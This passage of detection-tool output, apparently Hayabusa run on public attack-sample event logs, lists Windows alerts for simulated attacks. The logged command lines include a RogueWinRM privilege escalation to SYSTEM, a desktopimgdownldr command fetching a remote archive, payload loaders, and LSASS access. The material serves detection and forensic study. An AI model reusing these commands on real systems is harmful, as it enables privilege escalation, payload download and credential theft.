: Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx +2020-05-13 09:28:52.950 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceAndNoImpersonation -p -s wcncsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx +2020-05-24 10:13:47.756 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: RogueWinRM.exe -p c:\Windows\System32\cmd.exe : Path: C:\Users\IEUser\Tools\PrivEsc\RogueWinRM.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: ""cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 10:13:48.864 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 10:13:50.327 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: c:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: RogueWinRM.exe -p c:\Windows\System32\cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 10:13:51.206 +09:00,MSEDGEWIN10,3,high,Remote PowerShell 
Session,,rules/sigma/network_connection/sysmon_remote_powershell_session_network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 10:13:51.206 +09:00,MSEDGEWIN10,3,high,Remote PowerShell Session,,rules/sigma/network_connection/sysmon_remote_powershell_session_network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: c:\Windows\System32\cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-07-01 05:50:25.546 +09:00,MSEDGEWIN10,10,critical,Direct Syscall of NtOpenProcess,,rules/sigma/process_access/sysmon_direct_syscall_ntopenprocess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_10_Evasion_Suspicious_NtOpenProcess_CallTrace.evtx +2020-07-01 05:50:25.546 +09:00,MSEDGEWIN10,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_10_Evasion_Suspicious_NtOpenProcess_CallTrace.evtx +2020-07-03 02:51:37.819 +09:00,MSEDGEWIN10,1,high,Process Creation 
Sysmon Rule Alert,"Rule: suspicious execution path : Command: spooler.exe payload.bin : Path: C:\Users\Public\tools\cinj\spooler.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx +2020-07-03 02:51:37.819 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx +2020-07-03 02:51:37.872 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: notepad : Path: C:\Windows\System32\notepad.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\System32\spoolsv.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx +2020-07-03 02:51:37.872 +09:00,MSEDGEWIN10,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx +2020-07-03 03:00:29.615 +09:00,LAPTOP-JU4M3I0E,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: chost.exe payload.bin : Path: C:\Users\Public\tools\evasion\chost.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx +2020-07-03 03:00:29.615 +09:00,LAPTOP-JU4M3I0E,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx +2020-07-03 
03:00:29.650 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: notepad : Path: C:\Windows\System32\notepad.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: \??\C:\windows\system32\conhost.exe 0xffffffff -ForceV1,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx +2020-07-03 03:00:29.650 +09:00,LAPTOP-JU4M3I0E,1,medium,Conhost Parent Process Executions,,rules/sigma/process_creation/win_susp_conhost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx +2020-07-03 03:00:29.650 +09:00,LAPTOP-JU4M3I0E,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx +2020-07-03 17:47:20.037 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx +2020-07-03 17:47:20.037 +09:00,MSEDGEWIN10,1,high,Suspicious Desktopimgdownldr Command,,rules/sigma/process_creation/win_susp_desktopimgdownldr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx +2020-07-03 17:47:20.073 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr : Path: C:\Windows\System32\desktopimgdownldr.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z 
/eventName:desktopimgdownldr ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx +2020-07-03 17:47:20.073 +09:00,MSEDGEWIN10,1,high,Suspicious Desktopimgdownldr Command,,rules/sigma/process_creation/win_susp_desktopimgdownldr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx +2020-07-03 17:47:21.491 +09:00,MSEDGEWIN10,11,high,Suspicious Desktopimgdownldr Target File,,rules/sigma/file_event/win_susp_desktopimgdownldr_file.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx +2020-07-03 17:55:49.123 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Download LockScreen Image : URL: https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/windows_bits_4_59_60_lolbas desktopimgdownldr.evtx +2020-07-03 18:05:58.278 +09:00,win10.ecorp.com,1,informational,Process Creation,"Command: explorer.exe /root,""c:\windows\System32\calc.exe"" : Path: C:\Windows\explorer.exe : User: ECORP\Administrator : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx +2020-07-03 18:05:58.278 +09:00,win10.ecorp.com,1,medium,Explorer Root Flag Process Tree Break,,rules/sigma/process_creation/win_susp_explorer_break_proctree.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx +2020-07-03 18:05:58.278 +09:00,win10.ecorp.com,1,low,Proxy Execution Via Explorer.exe,,rules/sigma/process_creation/win_susp_explorer.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx +2020-07-03 
18:05:58.367 +09:00,win10.ecorp.com,1,informational,Process Creation,"Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding : Path: C:\Windows\explorer.exe : User: ECORP\Administrator : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx +2020-07-03 18:05:58.583 +09:00,win10.ecorp.com,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: ECORP\Administrator : Parent Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx +2020-07-03 18:05:58.739 +09:00,win10.ecorp.com,1,informational,Process Creation,"Command: ""C:\Windows\System32\win32calc.exe"" : Path: C:\Windows\System32\win32calc.exe : User: ECORP\Administrator : Parent Command: ""C:\Windows\System32\calc.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx +2020-07-04 23:18:58.268 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/evasion_persis_hidden_run_keyvalue_sysmon_13.evtx +2020-07-08 06:51:39.204 +09:00,LAPTOP-JU4M3I0E,10,high,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx +2020-07-08 06:51:39.256 +09:00,LAPTOP-JU4M3I0E,10,high,LSASS Access from Program in Suspicious 
Folder,,rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx +2020-07-08 06:51:39.262 +09:00,LAPTOP-JU4M3I0E,10,high,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx +2020-07-09 06:41:52.449 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_12_DE_AntiForensics_MRU_DeleteKey.evtx +2020-07-09 06:42:01.653 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_12_DE_AntiForensics_MRU_DeleteKey.evtx +2020-07-09 06:43:13.791 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_12_DE_AntiForensics_MRU_DeleteKey.evtx +2020-07-10 05:41:04.488 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ATACORE01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.490 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: PKI01$ : IP Address: ::ffff:10.23.23.9 : Status: 
0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.496 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: EXCHANGE01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.497 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: WEC01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.501 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: FS02$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.505 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: WSUS01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.534 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket 
Requested,User: admmig@OFFSEC.LAN : Service: DHCP01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.576 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ATANIDS01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.861 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: PRTG-MON$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.862 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: MSSQL01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.863 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: FS01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx 
+2020-07-10 05:41:04.864 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ADFS01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.865 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: WEBIIS01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.885 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.887 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: FS03VULN$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.887 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 
0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.912 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ROOTDC2$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.939 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.949 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.950 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.951 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket 
Requested,User: admmig@OFFSEC.LAN : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:05.016 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ROOTDC2$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:58.983 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:59.810 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:57:38.917 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 59919 : LogonID: 0x64f5bad,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:57:40.334 
+09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user : Workstation: - : IP Address: 10.23.23.9 : Port: 59920 : LogonID: 0x64f5bf1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:57:40.365 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user : Workstation: - : IP Address: 10.23.23.9 : Port: 59921 : LogonID: 0x64f5c04,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:57:40.430 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:57:40.430 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:57:40.714 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user : Workstation: - : IP Address: 10.23.23.9 : Port: 59993 : LogonID: 0x64f5c7f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:57:40.723 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user : Workstation: - : IP Address: 10.23.23.9 : Port: 60017 : LogonID: 
0x64f5cb1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:57:40.725 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user : Workstation: - : IP Address: 10.23.23.9 : Port: 60018 : LogonID: 0x64f5cc8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:57:40.728 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user : Workstation: - : IP Address: 10.23.23.9 : Port: 60019 : LogonID: 0x64f5cf4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 